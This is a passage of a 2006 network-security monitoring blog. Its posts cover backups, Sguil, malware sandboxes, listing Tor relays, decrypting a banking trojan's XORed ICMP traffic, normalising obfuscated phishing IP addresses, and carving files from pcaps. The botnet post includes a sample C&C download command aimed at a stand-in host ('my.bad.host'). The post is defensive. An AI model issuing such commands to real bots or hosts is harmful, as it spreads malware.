Monday, December 18, 2006

Practicing What I Preach

Imagine for a moment that you worked for an employer who didn't do regular backups of their important data. As a security pro, you know that regular backups are a central part of a good information protection strategy. If you're like me, you'd probably never agree that a lack of backups was a good long-term strategy for a business. That's just obvious.

Now stop imagining, and ask yourself whether or not you're following your own advice: are you backing up your personal data just as diligently as you protect your employer's?

I asked myself that same question last week, and the answer was, "no." I'm sure most of my readers are in the same boat, so consider this my Christmas present to you: a recommendation for a cheap, easy way to back up your personal data. (Sorry, it's Windows only, since that's most of what I run at home.)

It turns out that there are a lot of players in this area, many of which are targeted to the individual home user as well as to the small business. This is a pretty good roundup of several services. After doing a bit of reading, I decided to give one of them a try.

I chose Mozy, partly for its price ($4.95/month for unlimited storage), partly for its ease of use (set it and forget it), but mainly because it is the only one I saw that would allow me both to encrypt my backups and to set my own encryption key, one that is not stored by the company itself. The key is only available on my own PC, and as their warning dialog says, I'm "hosed" if I ever forget it. Still, it means that it's very unlikely that anyone but me will ever be able to recover my files from the company's backup servers.

My experiences so far have been quite positive. Setup was dead simple, and although it's going to take quite a while to upload that first massive 52GB bolus, block-level incremental backups should help keep the volume down after that. I've tried some sample restores from the Web, and they've worked out well. For an additional fee, Mozy will even FedEx me a set of restore DVDs if I need to do a full recovery and don't want to wait for a giant download. About the only thing I don't like is that Mozy won't back up the simple NAS box I just bought, but I guess I can live with that.

New Year's Day is fast approaching, and setting up a good personal backup system would make a great resolution. You can try many of these systems for free (including Mozy) and choose which you like best. Then you can party all night, secure in the knowledge that all those boozy, embarrassing digital photos from the office party will be safe from "accidental" deletion.

PS. If you do decide to try Mozy, you'll get 2GB of storage for free. For an extra bonus, you can click through this link and get an extra 256MB. I've already paid for the full Mozy subscription, so I'm not getting any referral bonus, but I thought I'd post it anyway. Who couldn't use an extra 256MB of space?

Update 2007-01-02 08:43: Just for your reference, it took me about 12 days to complete the first full backup. It actually came out to about 62GB, as I added some more files to be backed up even before the initial set finished. I also installed Mozy on my wife's computer, so I was doing two backups over a single connection for about 5 days.

All in all, everything has worked well so far. The biggest problem I've had was that the servers tend to disconnect the backup session during large (multi-gigabyte) transfers. This isn't a serious problem, because the clients simply restart the backup a little while later, but I'm sure it slowed things down a lot. I don't see this much now that I've completed my initial backup, though. Things seem to be going quite smoothly, and I'm still very pleased with the service.

Thursday, December 14, 2006

Sguil vs. BASE

This afternoon, someone asked me how I would categorize the differences between Sguil and BASE. I started with the standard response: "BASE is an alert browser, but Sguil encourages a more structured approach."

By the end of my reply, though, I found myself thinking about how to express this in a different way, something that emphasized the functionality of the two systems.

Here's what I came up with, excerpted from my own private email reply:

You can think of the process of intrusion analysis as formulating and then trying to answer a series of questions. For example, one series might be:


  1. Was this an actual attack?
  2. If so, was the attack successful?
  3. What other systems may also have been attacked?
  4. What activities did the intruder try to carry out?
  5. What other resources were they able to gain access to?
  6. How should we contain, eradicate and recover from the intrusion?

In this sequence, BASE does a great job of answering question #1. It may also have some information bearing on #3, but it probably wouldn't supply enough to give good answers to questions #2, #4 or #5. By correlating additional information sources, Sguil is often able to come up with very good answers to each of the first five questions. Of course, the more information you have at your disposal, the easier it will be to answer the most important question, #6.


Of course, I'd be very interested to hear from any BASE users who would like to either confirm or dispute my analysis. If that's you, leave a comment!

Monday, October 23, 2006

Comparing Automated Malware Analysis Services

Wow! It's been nearly two months since I posted anything here, for which I apologize. I've been busy as a bee. In fact, I think I caught the bees slacking off. I should be able to post a bit more regularly now, which ought to help me avoid losing my loyal reader.

This weekend, I happened to catch a computer that was infected with a fairly garden-variety IRC botnet, but this post really isn't about that. During the course of the investigation, I saw that the C&C server had instructed its victim to download and run a certain file. As I frequently do, I used wget to download the same file so I could see what was in it.

Normally, my first stop for malware analysis is the UNIX strings command, but in this case, the binary was packed, so there was very little information available.
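If you ever find yourself on a box without a real strings binary, by the way, a few lines of Perl make a passable stand-in. This is just a sketch; the four-character minimum mirrors the strings default.

#!/usr/bin/perl
# Poor man's strings(1): print every run of 4 or more printable ASCII
# characters in the file named on the command line. On a packed binary,
# expect little more than packer artifacts, which is exactly the problem
# described above.

use strict;
use warnings;

open(my $fh, '<', $ARGV[0]) or die "usage: $0 <binary>\n";
binmode($fh);
my $data = do { local $/; <$fh> };
close($fh);

while ($data =~ /([\x20-\x7e]{4,})/g) {
    print "$1\n";
}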

Now, I'm no programmer. I can do some simple C and some less simple Perl, but to be honest, I don't really have the sk1llz to do my own detailed malware analysis. Fortunately, this isn't much of a problem, because I rely on three excellent websites which can do this for me automatically.

I'm speaking, of course, about the Norman Sandbox, the CWSandbox and Virustotal. Each of these services offers a web-based interface for you to submit malware samples for automated analysis, usually returning the results within two or three minutes. Conceptually, they're all very similar, but they each have a different focus, so I thought a brief comparison might be in order.

Let's start with Virustotal, as it's much simpler than the others. Virustotal simply takes your sample and runs it against a variety of antivirus programs (I counted 26 this morning). The list includes most of the industry heavyweights, with the exception of Symantec. The end result is that you have a nice report that shows what, if anything, was detected in your sample malware. In my experience, it is rare that more than a handful of products properly detect the newest malware I find, so it's very handy to have a service that runs it through so many products and summarizes the output. The final report is delivered right on the web site, so once you submit your sample, you get a results page immediately, and as the scans progress, it is updated with fresh results.

Where Virustotal simply tells you the name of the detected malware, both the Norman and CW sandboxes provide much more detail about the internal workings of the suspect binary. Using a combination of simulation, API hooking and other techniques, they will actually run the binary in the sandbox environment and look to see what actions it takes.

The Norman analysis (sample) relies on the same sandbox engine they use in their commercial antivirus products, and apparently you can purchase your own copy of the same sandbox system that the free website uses. The report comes back as a text-based email, and typically includes a list of files or registry keys that are created, deleted or modified. It will also usually tell you if the malware automatically restarts at boot time or not. Other features, like URLs opened or processes spawned, are kind of hit-and-miss. Norman failed to detect any of the network communication in the sample I submitted this morning. Overall, the report is a little on the basic side, but it's good for a quick read-through to see if you should be worried.

By far the most informative of the three services is the CWSandbox. Based on work performed by Carsten Willems at the University of Mannheim, CWSandbox is optimized for analyzing binaries which contain botnet software. The report is far more detailed than the other two systems', and includes much better information about files, registry keys and processes used by the malware. In fact, in my test this morning, it was the only one of the three to extract the list of IPs and ports that the binary would attempt to connect to. Unfortunately, the report is in XML format only, which would be good if I were going to process it with a script of some sort, but it does make it a bit harder for the analyst to read directly. Still, since CWSandbox gives the most detail of the three, the extra effort is probably worthwhile.

If I had to pick just "the best" of the three, it would be CWSandbox, because it consistently gives more detailed information about the suspect binaries I upload. Fortunately, I don't have to pick just one, and I routinely use all three to give myself the broadest coverage, and thus the best chance of finding out what the code really does.

Update 2006-10-30 14:08: Anti-spyware company Sunbelt Software also has an automated analyzer, it turns out. They're using the CWSandbox engine, but it delivers the reports in HTML or text-based emails. The HTML reports use very little formatting, but they're a lot easier to read than the XML reports CWSandbox itself returns.

I tried the Sunbelt version against the same binary I used to test the others, and though I found the report to be more useful overall (because it was readable), it didn't seem to include quite as much information about the Internet hosts the binary would attempt to communicate with. Perhaps Sunbelt has an older version of the engine?

In any case, Sunbelt generates my new favorite reports, though I still recommend submitting samples to more than one engine, just to make sure you've got your bases covered.

Update 2007-09-24 13:55: Paperghost over at Vitalsecurity.org posted a link to a new service called ThreatExpert.com. TE is part online sandbox and part malware encyclopedia. Basically, you upload malware samples and you get a nice report. The reports are also available to other users, indexed by their standard malware names (if known).

There are tons of sample reports in the database, and they are by far the best looking and easiest to read of all the similar services. They seem to contain basically the same type of information you'll find in the competing services, such as registry keys modified, files created, processes forked, etc. I've also seen a few really nice extras, such as the inclusion of screen shots of any windows that the code creates. TE also tries to identify the probable country of origin for the file, though I really have no idea how they do this. Strings analysis of the language included in the embedded text, perhaps? Another big plus is that it's the only such service to provide an optional user account that allows you to quickly locate and review reports for any of the samples you submitted. I can see this being very useful.

You'll notice that I used the phrase "seem to" in the last paragraph. For some reason, both of the UPX-packed samples I submitted failed to run properly. I got a report, but the sandbox indicated that the file could not be analyzed. To be fair, both the Norman and the Sunbelt sandboxes choked on it as well, failing to report any malicious activity at all. While this did keep me from generating a good comparative report, I'd have to say that ThreatExpert seems like a promising addition to my list of "go to" services for automated malware analysis.

Thursday, August 31, 2006

Listing active Tor servers...

Want to know the list of active Tor servers at any given time? It turns out that this is fairly easy to do.

When a Tor client starts up, and from time to time during normal operation, it needs to refresh its list of active servers. The Tor network maintains several "directory servers" which keep track of which nodes are willing to perform onion routing functions. Because a client can't join the Tor network before it knows which Tor servers to use, the directory has to be reachable outside of Tor itself, which means anyone can fetch it from the public Internet using plain HTTP.

The basic idea is pretty simple. Just visit one of the directory servers with a URL like the following:


http://belegost.mit.edu/tor/

The belegost.mit.edu system is one of the five or so authoritative Tor directories on the Internet, so it should be fairly stable. The file it returns contains all the information that a Tor client needs to know about each of the servers, including IP addresses and port numbers. The Tor directory protocol document can help you interpret the details fairly easily.

Of course, if you just want to know the list of active servers for monitoring or blocking purposes, you can just run the following perl script, which will dump out the server names, IP addresses and onion routing ports for you.

#!/usr/bin/perl
#
# Fetch the list of known Tor servers (from an existing Tor server) and
# display some of the basic info for each router.

use LWP::Simple;

# Hostname of an existing Tor router. We use one of the directory authorities
# since that's pretty much what they're for.
$INITIAL_TOR_SERVER = "18.244.0.114"; # moria2 / belegost.mit.edu
$INITIAL_TOR_PORT = 80;

# Fetch the list of servers
$content = get("http://$INITIAL_TOR_SERVER:$INITIAL_TOR_PORT/tor/");
@lines = split /\n/,$content;

foreach $router (@lines) {
    if($router =~ m/^router\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$/m) {
        ($name, $address, $or_port, $socks_port, $directory_port) =
            ($1, $2, $3, $4, $5);
        print "$name $address $or_port\n";
    }
}


Update 2008-06-09 11:38: In the nearly two years since I wrote this original post, the Tor folks have updated their directory protocol, and this script no longer works. Please see my newer post for an update and some working code.

Tuesday, August 29, 2006

Network Security Monitoring Wiki Launched

In cooperation with the Sguil project, I've just launched a new wiki, dedicated to Sguil and all things NSM: NSMWiki.

If you're a Sguil user, an NSM/IDS analyst, or just interested in network security in general, you should find things of interest there. It's just a skeleton now, but the great thing about wikis is that you can help us flesh it out!

Friday, August 25, 2006

The Pwnion

Inspired in part by my earlier posting about The Hidden Dangers of Protocols, some of us on #snort-gui were playing with the idea of The Onion applied to security. Here are some of the headlines we came up with.

<Hanashi> "Area Man's Password Hacked After He Exchanges it for Chocolate Bar"
<Hanashi> "Commentary: I Totally Pwn!"
<Nigel_VRT> "Wireless: No Wires! What's up with that?"
<Nigel_VRT> "Undisclosed remote bug in software that some people use"
<Hanashi> "Study: Second graders way too amused by phrase 'IP'"
<helevius> "Jumbo Frames: Obese, or Just Big Boned?"
<Hanashi> "Covert Channel Discovered in IPv6: The Use of IPv6"
<Nigel_VRT> "If you don't use Microsoft Windows, you're an evil hacker. By Staff writer Will G. Ates"


What about you? Post your best funny headlines in the comments!

Wednesday, August 23, 2006

I love command-line perl

If you read my blog on a regular basis, you've probably figured out that my favorite tool for performing general analysis and data manipulation is perl. Preferably, perl from the command line:

% cat data.dat | perl -e '...some code...' | less

Daniel Wesemann, one of the handlers at the Internet Storm Center, posted a neato article on decoding traffic to uncover hidden executable content. And guess what it uses?

Daniel, I like your style!
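In case you've never played with one-liners like these, here's the flavor of thing they're good for: turning a hex dump you've pasted out of a packet capture back into a binary file so you can poke at the payload with other tools. This assumes the dump is nothing but hex digits and whitespace, and the filenames are just placeholders.

% perl -ne 's/\s+//g; print pack("H*", $_)' < dump.hex > payload.bin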

Tuesday, August 22, 2006

Dear BoingBoing...

If you've ever checked out my blogroll, you might have noticed that I read BoingBoing on a regular basis. Most of their posts are pretty interesting, but they seem to have a chip on their collective shoulder when it comes to a certain Internet content filtering product. Their most recent post on the subject really got my attention.

In response, here is an open letter to the editors at BoingBoing.

Dear BoingBoing,

I'm right there with you when you cover issues of government-sponsored censorship. Censorship is contrary to the ideas of freedom and democracy. But it's not censorship when the administrator of a corporate or privately-owned network enforces a policy on how their network should be used. In most cases, that's just good security management. Please don't confuse the issues, because it weakens your position when you speak out about legitimate abuses.

WebSense isn't censoring you. WebSense doesn't censor anyone. All they do is categorize websites, and it's up to their individual customers to create and enforce filtering policies based on those categories. In this latest case, the site archive.org does in fact offer software downloads and is correctly categorized. And whether or not you agree with the idea, as a security pro, let me assure you that filtering such sites is a very reasonable thing to do for many organizations, especially those that have policies against installing arbitrary software.

Of course, as you're finding out, filtering technology isn't perfect. Sites are misclassified or simply not categorized at all. Filtering software can be bypassed, fooled or even brought down. That does not mean that it is worthless and evil, however. Every little bit helps, and the technology improves each day (albeit slowly).

Anyway, thanks for all your hard work on BoingBoing. I do enjoy reading most of what you write, but I hope you'll keep my points in mind next time you write a story about Internet content filters.

I answered my own question

A couple of weeks ago, I wrote about the FBI's call for help from the security community. My question then was, "How do we get in touch with the FBI to offer our help?"

It turns out not to be very difficult. The same day, I wrote the following email to my local FBI field office:

Good morning. I've been reading news articles for the past few days about FBI Cybercrime Unit Chief Daniel Larkin's speech at the Blackhat conference last week. In it, he called for assistance from the information security community. I admit that I'm not really sure exactly what sort of help is required, but I'd like to contact someone in your office in order to offer my assistance.

I've been doing IT and Cybersecurity for about 15 years, and my specialties include analyzing hacker techniques, security incident response and security monitoring/intrusion detection. I run my own security consulting company, which you can read about on my website (www.vorant.com).

I'd like you to know that if the need arises, I'm here to help.


To my surprise, I got an email from one of the Special Agents assigned to the cybercrime team at the local field office. We met this morning at the local coffee shop.

It turns out that the number one thing he needs is a network of people on the front line that can identify potentially-significant threats, ideally before they can become truly dangerous. New hacking techniques, novel scams and the like. As NSM/IDS people, we're likely to pick up on these sorts of things before they are otherwise widely-known, and this could provide law enforcement with a valuable heads-up.

Now, I'm not suggesting that you hand over your monitoring data to the FBI or any other agency at the slightest provocation. There are significant privacy and organizational policy concerns to be aware of. Unless you're actually reporting a crime, be careful about what you reveal. In most cases, however, there's no problem with sharing information about the technique or the possible impact of a successful attack.

If you'd like to try hooking up with your local FBI field office, check out this list of field offices. Give it a try and let me know how it goes.

Friday, August 18, 2006

Tony Bradley: Reform Candidate for the ISC(2) Board

Those of you who hold the CISSP know that elections for the ISC(2) Board of Directors are coming up soon. Usually the existing Board members put forth a slate of candidates themselves, but there is a provision for an individual to be added to the ballot without the Board's approval. If the candidate can get the support of 1% of the membership on a petition, they're added to the ballot.

Today, I got the official notice that one member, Tony Bradley (CISSP-ISSAP), has elected to pursue this route. After reading his platform, I've decided to sign his petition. Here's an excerpt, which summarizes things nicely:

There are three primary components of my platform and vision for ISC2 should I be elected.

  • ISC2 should work to cooperate and coordinate with other security organizations and professionals to develop a set of generally accepted information security principles.
  • ISC2 should publicly vet the contents of the CBK in order to improve the information as well as expanding the acceptance and respect granted to those who show an understanding of the CBK through achieving the CISSP certification.
  • Election procedures should be modified to reduce the hegemony of the sitting Board of Directors and ensure a fair election process that allows the constituents to pursue election more freely.

I strongly support his first two points. We're plagued with "professionals" without proper training or knowledge and "solutions" that only solve vendor cash flow problems. Common Criteria is an attempt to solve the "solutions" problem, but so far there isn't a good solution for ensuring that we're hiring competent professionals. Certifications (like the CISSP) and accreditations may be an answer, but without an industry-wide agreement on their content, it's difficult to evaluate their effectiveness.

That's where the ISC(2)'s Common Body of Knowledge (CBK) comes in. It's probably the most extensive security knowledgebase available, but it's also proprietary, and that holds it back. Having just taken the CISSP test this year, my experience with the CBK is fresh in my mind. There are parts of it that sorely need the kind of open review process Bradley proposes.

If you're an ISC(2) member, I encourage you to read Mr. Bradley's comments.

Wednesday, August 16, 2006

Dumbest. Seminar. Ever.

I got the following today, from a very reputable security vendor. I'm not going to name them, because I think they're otherwise pretty good, but this is really just pathetic:

The Hidden Dangers of Protocols

Protocols are the sets of rules governing the communications of network applications, such as instant messaging, peer-to-peer file sharing, and streaming media. But, protocols may allow these communications to transmit confidential information, spyware, keyloggers, worms, viruses, and other security threats into and out of your organization. Protocols may also allow users to access inappropriate applications. Plus, they may be consuming valuable network bandwidth and draining user productivity in the process!

Protocols are dangerous? I've got news for this writer: protocols put the "work" in "network". Without TCP/IP, odds are you don't have a network, and that's not counting the myriad other protocols above and below the IP level.

Clearly, the vendor (as a whole) understands the concept of protocols perfectly well. So I conclude that either they've hired an incompetent writer or editor in the marketing department, or they're taking the chance to do a little FUD-mongering. I'll be charitable and guess it's the former.

Seriously, this is the dumbest thing I've seen from a security company in quite a long time.

Tuesday, August 08, 2006

Decrypting XORed ICMP Packets

This morning, WebSense issued an alert about a new trojan that uses ICMP packets to send banking data back to the controller's collection site. As far as I can tell, it registers as a browser helper object (BHO) with IE, then waits for you to go to any of a predefined list of banking site login pages. When you submit your authentication data, it sends a copy back to the attacker via ICMP.

This is new in a mass-market trojan, but the technique has been known for some time (google loki ICMP to see some early work on ICMP tunnels). The interesting part is that WebSense posted a sample packet in both encrypted and decrypted form (minus a few bytes that contained personally identifiable information about the victim).

Just for fun, I decided to find the decryption key. For your reference, here is the key used to encrypt the WebSense sample packet:


60 31 75 70 73 a0 a9 91 d7 c4 09 7b 78 e9 b3 8e
89 8b 5f 6d 6f 6a 2b 53 48 54 5c b9 2c 36 63 04
d3 1a 58 02 fa e7 d9 17 3f da db 41 bb f7 b3 83
86 83 4e 20 7f 6d 79 07 8c 10 56 01 f6 23 d1 1a
e0 5d XX XX XX bc 3e 13 1b 0f 01 4d bd 9f b8 92
9e 8b 7e 22 XX XX XX XX XX XX XX b7 ca f4 eb f0
c7 e2 08 f5 05 e5 a4 85 87 82 f6 6e 54 3f XX XX
XX XX XX f8 e6 e1 8b 90 83 8b 82 98 6d 73 60 47
92 90 9c 7f 68 6a 7c 42 52 53 42 2f 34 37 37 04
1d 72 68 ab 93 98 a5 97 97 94 98 fc e2 e9 e4 d3
2a c6 da 34 54 40 5c 1c c2 04 06 67 15 a4 a0 98
9a 1c bd 5c 71 6e b2 a2 e2 1c 49 3f 2c d7 f5 0e
1f 5f c1 ea fc ed 10 24 cc d7 dc fe 90 ab a0 9b
53 75 89 6a 2c 45 74 5f 5a 96 a5 3f 28 60 2c 00
17 36 d1 f1 e9 eb 0b c1 85 95 9d e5 f7 12 34 0c
59 56 5a a0 b3 65 64 55 56 56 03 78 0a 6d 1a fc
f0 d5 9a 41 57 4b 52 5a 36 4f 3d 66 77 54 7e 6a
90 cf b8 41 3e 34 ff e5 f3 cb de b2 eb f3 e9 cf
c2 0d 1c ee ab cb e4 de 8c 65 63 a1 bd 77 69 69
8e 92 86 6f 82 60 26 54 4c 4a 53 da 56 4a 47 6f
4f d2 a4 25 00 00

The bold XX bytes are the ones for which the plaintext was obscured, so I couldn't easily recover those portions of the key with just the single sample packet.

Bonus points to the first reader who posts code to verify this. It's pretty simple, but a fun etude for security folks. Extra bonus points if you can confirm that all packets use the same key and/or find missing key bytes that weren't available in the sample packet. What are you waiting for?
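To get you started, here's a minimal sketch of the core operation. It just XORs two equal-length binary files byte for byte and prints the result as hex, so you can feed it the ciphertext and plaintext to recover the keystream, or the ciphertext and the key above to recover the plaintext. You'll have to hex-decode the WebSense samples into binary files yourself; the filenames below are placeholders.

#!/usr/bin/perl
# XOR two equal-length binary files byte-for-byte and print the result as hex.
# Feed it ciphertext + plaintext to recover the keystream, or ciphertext + key
# to recover the plaintext. The filenames are placeholders; hex-decode the
# published samples into binary files first.

use strict;
use warnings;

die "usage: $0 file1 file2\n" unless @ARGV == 2;

my @buf;
for my $file (@ARGV) {
    local $/;
    open(my $fh, '<', $file) or die "can't open $file: $!\n";
    binmode($fh);
    push @buf, <$fh>;
    close($fh);
}

my $result = $buf[0] ^ $buf[1];   # Perl's bitwise string XOR

# Print 16 bytes per line, like the key listing above
my @bytes = map { sprintf "%02x", ord } split //, $result;
while (my @row = splice(@bytes, 0, 16)) {
    print "@row\n";
}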

Monday, August 07, 2006

"FBI needs hackers" -- Ok, now what?

Breaking non-news! Vnunet reports that the FBI needs hackers to help it understand and combat cybercrime. I've heard this a million times before, and not just from Blackhat last week.

So my question is what, specifically, should we be doing? I'm sure I'm not the only security pro willing to lend a hand, but how should we each go about doing it? There are plenty of us who have solid technical chops, the ability to communicate with non-technical audiences and the strong desire to use our powers for good. Has anyone successfully stepped up, and can you share your thoughts on how to get started?

Thursday, August 03, 2006

Crazy Botnet Idea

I read with interest Gadi Evron's recent post, mitigating botnet C&Cs has become useless (while you're at it, read Richard Bejtlich's response, too). Gadi Evron has probably forgotten, relearned and forgotten again more things about botnets than I will ever know, so when he speaks on the subject, I pay attention.

As with most security problems, the basic issue here is that competition drives innovation. Like biological evolution, the digital evolutionary imperative mandates that as we improve our defensive techniques, the Bad Guys also improve their offense. With the transition from amateur malware writers to professional bad actors, the pace of this evolution has already increased dramatically, and it will only continue to do so.

So what can we do? First, let me make the following assertion:

Botnets are harmful both to local networks and users, and to the Internet community as a whole.

I don't think anyone would disagree with that statement. Let's follow it up with another:

Doing nothing to protect ourselves is not an option.

Now, if we accept Gadi's premise that cutting off C&C channels is harmful in the long run, where does that leave us?

The root of that premise is that long-term harm occurs because our current methods have too high an impact on botnets. By shutting off the C&C servers, we take a discernible action, forcing the botnet owners to respond or lose access to their net.

Let's think about this for a second. If we've so far fought the problem by shutting down C&C servers, it stands to reason that most of the botnet countermeasures have also evolved to deal specifically with that sort of threat. If we're able to change our response, we may gain (temporary) advantage.

So here's my crazy idea. The HoneyNet Project already has tools that dynamically modify network traffic in order to prevent outgoing attacks from their honeypots from affecting other Internet hosts. Let's repurpose this technology to act in reverse; let's use it to protect our hosts from fully participating in identified botnet C&C channels.

How would this work? I haven't worked all the details out, but I'm thinking of something like the following:

  1. The attacker sends a command to a host through the C&C channel (e.g., .download http://my.bad.host/file.exe)
  2. An anti-botnet gateway at the user's site intercepts this, and transparently modifies the packet to say something slightly different (e.g., .d0wnl04d http://my.bad.host/file.exe); see the sketch just after this list
  3. The botnet node on the compromised PC doesn't recognize this as a command, so takes no action
  4. The attacker never realizes that he's lost control of the botnet node, because it's still participating in the C&C communication channel. Even though he's not getting any responses to some of his dangerous commands, perhaps less dangerous commands are working well, disguising the fact that we're interfering with his attacks.
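To make step 2 a little more concrete, here's a toy sketch of the rewrite itself. It assumes the gateway already has the packet payload in hand (however you choose to intercept it), and that every substitution is exactly the same length as the original command, so nothing about the packet sizes or TCP sequence numbers has to change. The command list is hypothetical; a real deployment would pull it from ongoing C&C analysis.

#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical command list: each replacement is the same length as the
# original, so the rewritten packet needs no size or sequence adjustments.
my %mangle = (
    '.download' => '.d0wnl04d',
    '.update'   => '.upd4t3',
    '.execute'  => '.ex3cut3',
);

# Rewrite any known-dangerous commands in a captured C&C payload.
sub mangle_payload {
    my ($payload) = @_;
    for my $cmd (keys %mangle) {
        $payload =~ s/\Q$cmd\E/$mangle{$cmd}/g;
    }
    return $payload;
}

# The example command from step 1 above:
print mangle_payload(".download http://my.bad.host/file.exe\n");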

You're probably saying to yourself, "Hey, this requires a lot of work to maintain." If so, you'd be right. We'd have to track the botnet C&C channels, analyze their command structures and somehow get updates out to the protected sites. I think of this as sort of an extension to current spyware/malware discovery processes, and we'd probably need some serious commercial support if this idea were to ever be implemented.

The point is, we've tried attacking the problem both from the C&C side (shutting down servers) and from the client side (patch management & user education). Now let's try something that more fully leverages our control over our own network infrastructure, too.

I told you it was a crazy idea.

Friday, July 21, 2006

Extracting gzipped or Unix script files from pcap data

During an incident response, it's often handy to be able to examine the actual attack traffic, and if you're using Sguil, you probably have it handy. One common situation is that an intruder has transferred files to or from your network, and you'd really like to see what's in them.

There's a great tool for extracting arbitrary files from pcap dumps, tcpxtract. Similar to the way hard drive forensic tools look through bytes on the disk to find the "magic headers" at the beginning of various types of files, tcpxtract combs through pcaps looking for file types it knows, regardless of the transport protocol used to ship them over the network. When it finds them, it writes them out to individual files for manual analysis.

Tcpxtract is a great tool for NSM practitioners, and should be in everyone's standard kit. There are a few common types of files that it doesn't support, but you can easily fix this by simply editing the tcpxtract.conf file to add support for new types if you know their magic numbers.

My friend geek00L has already blogged about adding Windows PE executable support. Now I'm here to tell you how to add support for gzipped files and Unix script files like "#!/some/file" ("#!/bin/sh" or "#!/usr/bin/perl" for example).

Just add the following two lines to the end of tcpxtract.conf:


gzip(1000000, \x1f\x8b\x08);
script(1000000, \x23\x21\x2f);

A little anti-climactic after all that buildup, wasn't it? I've had some advice that the script detection is likely to throw lots of false positives in an SSL session, so maybe you should keep it commented out until you know there are script files in the session that you need to find.
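And if you ever want to double-check a hit by hand, the magic-number idea is easy to apply directly. Here's a quick sketch that prints the offset of every gzip header in whatever file you point it at (a raw pcap, a tcpflow output file, whatever):

#!/usr/bin/perl
# Print the byte offset of each gzip magic header (1f 8b 08) found in a file.
# Useful for eyeballing a capture before or after running tcpxtract.

use strict;
use warnings;

open(my $fh, '<', $ARGV[0]) or die "usage: $0 <file>\n";
binmode($fh);
my $data = do { local $/; <$fh> };
close($fh);

while ($data =~ /\x1f\x8b\x08/g) {
    printf "gzip header at offset %d\n", pos($data) - 3;
}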

Thursday, July 13, 2006

Canonicalizing funky IP addresses

I've been playing around with some phishing data recently, to see if I can correlate known phishing attempts with my outgoing network sessions in order to alert me when my users fall victim. I don't have any results to report for this yet, but I did have to do some research into canonicalizing IP addresses.

Most people don't realize this, but there are a few different IP address formats. We're used to seeing the dotted decimal quad form (e.g. "192.168.1.1"), but there are others, and the phishers are using them. Thus, it behooves us to know how to work with them.

I was unable to find a comprehensive list of available formats online for some reason (if you know of one, please leave a comment!) so I examined my corpus of phishing URLs and found the following examples:


  1. 192.168.1.1
  2. 1127353292
  3. 0x43320bcc
  4. 192.0x43.9.3 (i.e., mixed decimal and hex quads)


Of course, phishers are using normal hostnames as well, giving us at least 5 different types of possible inputs to deal with. Most of our tools use the decimal dotted quad format, so we need to normalize these formats into something useful.

Here's a Perl function that should do this for you. If you pass it any of the above formats (including the hostname), it will normalize the input and return a decimal dotted quad in string form, suitable for your favorite security tool. If it can't be converted (maybe it's a hostname that no longer resolves) the function returns undef instead.

I've wrapped this in a simple command-line tool and also incorporated it into other Perl scripts. I'm sure you'll find other uses for it as well. And hey, if you come across any other legal address formats, please let me know.


use Socket;

# Take any valid IP address or hostname and return the normalized IP address.
# Recognizes the following formats:
# some.host.com
# 192.168.0.1
# 0x43320bcc
# 1127353292
# 192.0x1c.0x10.9 (ie, mixed decimal and hex quads)
# The function returns the string value of the IP address if successful, or
# undef if not.
#
# Warnings:
# 1) This will return only a single address, so if the hostname resolves
# to more than one address, you won't get them all.
# 2) It will generate a DNS query when looking up hostnames
sub normalize_funky_addrs {
    my($host) = @_;
    my($addr);

    # If this is a hex address (e.g., "0x01234FAc") then first convert it to
    # decimal form
    if($host =~ m/^0x[a-fA-F0-9]+$/i) {
        $host = hex($host);
    }

    # If the entire address wasn't hex, individual octets might be. If so,
    # find them and convert them. Split the address into octets, check and
    # convert hex in each octet as necessary, then paste them all back together
    # into one string and continue processing. Yes, I could just return here,
    # but I'd rather have only one function exit point.
    if($host =~ m/^([^.]+)\.([^.]+)\.([^.]+)\.([^.]+)$/) {
        ($octet1, $octet2, $octet3, $octet4) = ($1, $2, $3, $4);
        $octet1 = hex($octet1) if ($octet1 =~ m/0x/i);
        $octet2 = hex($octet2) if ($octet2 =~ m/0x/i);
        $octet3 = hex($octet3) if ($octet3 =~ m/0x/i);
        $octet4 = hex($octet4) if ($octet4 =~ m/0x/i);
        $host = "$octet1.$octet2.$octet3.$octet4";
    }

    # Now we've either got a hostname, a normal IP address or an integer-form
    # IP address. We can work with any of those.
    $addr = gethostbyname($host);
    if($addr) {
        return inet_ntoa($addr);
    } else {
        return undef;
    }
}
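I won't post my whole command-line tool, but the wrapper really is trivial. Here's a minimal sketch (the script name is arbitrary; paste the function above at the bottom of the file):

#!/usr/bin/perl
# normalize_addr.pl -- print the canonical dotted-quad form of each argument.
# Minimal wrapper sketch around normalize_funky_addrs() from above.

use Socket;

foreach my $arg (@ARGV) {
    my $ip = normalize_funky_addrs($arg);
    print defined($ip) ? "$arg -> $ip\n" : "$arg -> (could not be converted)\n";
}

# sub normalize_funky_addrs { ... }   # paste the function from above here

# Example:
#   % ./normalize_addr.pl 0x43320bcc 192.0x43.9.3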

Thursday, June 22, 2006

Extracting email attachments from pcap files

From time to time, I need to examine email attachments that may have been delivered to my users, usually to see exactly what type of malware was included. Now, I could call them up and ask them if they got the message, but there are several reasons I don't like to do that. For example, I hate playing telephone tag, and I don't really want to encourage them to open the message for any reason.

Since I use Sguil, I have another option. I can extract the attachment from the network data directly. Here's how.


  1. Capture the session of interest as a pcap file. If you're also using Sguil, you can probably just do a SANCP search to find the network session that contained the message as it was delivered to your SMTP server. Open it up in Ethereal, which causes the Sguil client to copy the pcap file to your analysis workstation. Close Ethereal now, because you won't be using it for this.
  2. Once you have the pcap file, use the tcpflow tool to extract an ASCII version of the conversation. This will create two files, one for the server side of the session, and one for the client side. Here's an example, where xxx.xxx.xxx.xxx is the sending host, and zzz.zzz.zzz.zzz is your mail server:

    % tcpflow -r xxx.xxx.xxx.xxx_yyyy_zzz.zzz.zzz.zzz_25-6.raw
    % ls
    xxx.xxx.xxx.xxx_yyyy_zzz.zzz.zzz.zzz_25-6.raw
    xxx.xxx.xxx.xxx.yyyy-zzz.zzz.zzz.zzz.00025
    zzz.zzz.zzz.zzz.0025-xxx.xxx.xxx.xxx.yyyy

    The file you need to concern yourself with now is the one that ends in .00025. That's the one that contains the email message sent by the client.
  3. Edit the *.00025 file in your favorite text editor. As it is now, it's a complete record of all the SMTP protocol events, and what you really want is just the data. The easiest thing is just to delete everything up to (but not including) the first line that starts with "Received:".
  4. Use the following perl command to read the mail file in via stdin and dump out the decoded MIME message. The script uses the MIME::Parser module (available from CPAN) to handle MIME decoding.

    % perl -e 'use MIME::Parser; \
    $parser = new MIME::Parser; \
    $parser->output_under("/var/tmp"); \
